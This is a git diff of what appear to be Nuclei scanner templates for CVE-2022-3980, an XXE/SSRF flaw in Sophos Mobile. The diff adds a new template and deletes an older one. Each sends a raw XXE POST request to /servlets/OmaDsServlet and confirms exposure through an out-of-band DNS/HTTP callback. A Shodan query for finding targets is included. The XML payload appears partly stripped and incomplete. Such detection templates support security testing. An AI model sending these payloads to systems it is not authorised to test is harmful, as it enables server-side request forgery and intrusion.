diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml new file mode 100644 index 0000000000..e7afb917c1 --- /dev/null +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-3980 + +info: + name: Sophos Mobile managed on-premises - XML External Entity Injection + author: dabla + severity: critical + description: | + An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + reference: + - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee + - https://nvd.nist.gov/vuln/detail/CVE-2022-3980 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-611 + cve-id: CVE-2022-3980 + metadata: + max-request: 1 + verified: "true" + shodan-query: title:"Sophos Mobile" + tags: cve,cve2022,xxe,ssrf + +http: + - raw: + - | + @timeout: 50s + POST /servlets/OmaDsServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: "application/xml" + + + %test;]> + test + + redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + - "http" + condition: or + + - type: status + status: + - 400 diff --git a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml b/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml deleted file mode 100644 index 756f446567..0000000000 --- a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: sophos-mobile-xxe_CVE-2022-3980 - -info: - name: XEE vulnerability in Sophos Mobile managed on-premises - author: dabla - severity: critical - description: Checks exeecution of XXE Payload via dns canary - reference: https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-611 - cve-id: CVE-2022-3980 - tags: xxe,ssrf - -http: - - raw: - - | - POST /servlets/OmaDsServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: "application/xml" - - - %test;]> - test - - redirects: true - max-redirects: 3 - - matchers-condition: or - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - - type: word - part: interactsh_protocol - name: dns - words: - - "dns" \ No newline at end of file